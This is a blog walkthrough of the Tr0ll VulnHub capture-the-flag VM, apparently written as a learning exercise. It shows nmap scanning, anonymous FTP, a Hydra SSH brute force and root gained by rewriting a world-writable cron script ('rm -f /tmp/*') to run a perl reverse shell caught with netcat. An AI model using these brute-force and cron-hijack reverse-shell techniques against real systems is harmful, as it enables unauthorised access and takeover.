The troller trolled the Tr0ll

Hey everyone so this is the VM for the tr0ll server! i know it is kind of old but since i am trolling everyday in real life i thought i would try it so tr0ll2 is on the way too 😀
Let me add here that this challenge was made by Maleus and hosted by vulnhub!

Anyway lets stop with all the blabbing and start our challenge
tr0ll server ip:
kali ip:

At first i tried a nmap scan

root@kali:~# nmap -vv -sV

Starting Nmap 6.49BETA4 ( ) at 2015-10-10 12:01 EDT
NSE: Loaded 33 scripts for scanning.
Initiating ARP Ping Scan at 12:01
Scanning [1 port]
Completed ARP Ping Scan at 12:01, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:01
Completed Parallel DNS resolution of 1 host. at 12:01, 0.00s elapsed
Initiating SYN Stealth Scan at 12:01
Scanning ( [1000 ports]
Discovered open port 21/tcp on
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Completed SYN Stealth Scan at 12:01, 1.22s elapsed (1000 total ports)
Initiating Service scan at 12:01
Scanning 3 services on (
Completed Service scan at 12:01, 6.10s elapsed (3 services on 1 host)
NSE: Script scanning
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 12:01
Completed NSE at 12:01, 1.27s elapsed
Nmap scan report for (
Host is up, received arp-response (0.00031s latency).
Scanned at 2015-10-10 12:01:04 EDT for 9s
Not shown: 997 closed ports
Reason: 997 resets
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.2
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:FE:92:AF (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 9.55 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.040KB)

As we can see, we have 3 ports open! SSH,FTP,HTTP
so i started by connecting on the ftp with the classic anonymous access and guess what! i found a pcap file!

root@kali:~# ftp
Connected to
220 (vsFTPd 3.0.2)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (87.4346 MB/s)
ftp> quit
221 Goodbye.

after this i downloaded the file and used wireshark to check it out!! interesting things have been captured… 😀
first i found out a file named secret_stuff.txt ( i never found this file although i kind of forgot to look for it when i accessed the server)
although that is not the only thing we noticed! there was a secret folder!!!!
Well this is as far as we can get lets try some http enumeration and stuff…after i checked the http server boom! the tr0ll starts!
nothing there so i checked the robots.txt and we found a folder named secret!
holy server unveil your secrets!
OMG another troll…. -_- i was like ok suuuure now what?but then it hit me!we have that sup3rs3cr3tdirlol that could be a folder and what do u know…there is a file there
Ofc i downloaded it and checked it out

root@kali:~/Downloads# strings roflmao
Find address 0x0856BF to proceed
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2

there is an interesting text telling me to find an address 0x0856BF i thought that could be a folder and checked it out…boom hints about the password of ssh hopefully 😉

in the good_luck folder we found a file called which_one_lol.txt which seemed like a possible user list ofc i deleted the text that was saying <–definitely not this one so i saved it for later

the other folder this_folder_contain_the_password had a Pass.txt file after opening it this is what i got…

while trying to crack the damn ssh by crafting a list of the usernames and that password i got, i had zero success there was something wrong ofc the folder though told me that the password was in there but not in the file so i got the name of the Pass.txt and tried it as password so voila

root@kali:~/Desktop# hydra ssh:// -L user.txt -p Pass.txt
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2015-10-10 12:20:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 64 tasks, 10 login tries (l:10/p:1), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: login: overflow password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2015-10-10 12:20:17

the username for the ssh is overflow and the password is Pass.txt so lets connect on the ssh and work some magic!

This is the place where we start our system enumeration to check what we can find…i looked around didnt find anything to stand out except from a file in the /opt folder called
which i couldnt read cause hello?low permissions so how do we do some priv escalation?we need to find writable file that can run as run so really quick we scan for any files that are writable

sudo find / -perm -2 ! -type l -ls

what caught my attention though was this file!

155826 4 -rwxrwxrwx 1 root root 96 Aug 13 2014 /lib/log/

after cat-ing the file we can see its code

#!/usr/bin/env python
import os
import sys
os.system('rm -f /tmp/*')

this is good but how does this run???we can totally change the bash command to run something that will benefit us but how do we run it as root? lets look around…after a while i found out that was being executed every 2 minutes by cron schedule task. well the was deleting every 2 minutes whatever we might have downloaded in the /tmp folder so i modified and to this

#!/usr/bin/env python
import os
import sys
os.system('ls /tmp/')

and it gave me some time although right about now we had a problem :/ the connection was closed -_- i feel another cron task every 2 minutes as i figured out later
so ofc i reconnected and i browsed to the /tmp folder as fast as possible to download the classic perl reverse shell backdoor,i edited it real quick to connect back to kali and chmod +x the shell ^_^
again i had to modify the to execute the perl shell so i changed the code to this

#!/usr/bin/env python
import os
import sys

and i am good to go now lets w8 for 2 minutes to start by itself………..2 minutes later boom!

root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 57849
09:50:01 up 1:13, 0 users, load average: 0.00, 0.01, 0.05
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
/usr/sbin/apache: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -r
# uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
# cat /opt/
#!/usr/bin/env python
import os

os.system('echo "TIMES UP LOL!"|wall')
os.system("pkill -u 'overflow'")

# ls /root/
# cat /root/proof.txt
Good job, you did it!


i included the cause it had stuck to my head since the beginning and it was the annoying script that was disconnecting me every 2 minutes…

thx a lot for this challenge you can always learn more stuff from all the challenges cya until the next tr0ll bye everyone 😉


2 responses to “The troller trolled the Tr0ll

  1. I am having issues with rar download file from Vulnhub, I have downloaded tr0ll1.rar straight into kali linux box, extract into folder, there are several files in it but do not know what they are.
    I use netdiscover to find the IP address but none found for me to go through walkthrough guide.
    Do i need to run the file in the folder after extract the rar program before I proceed? Can anyone help? Thanks


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s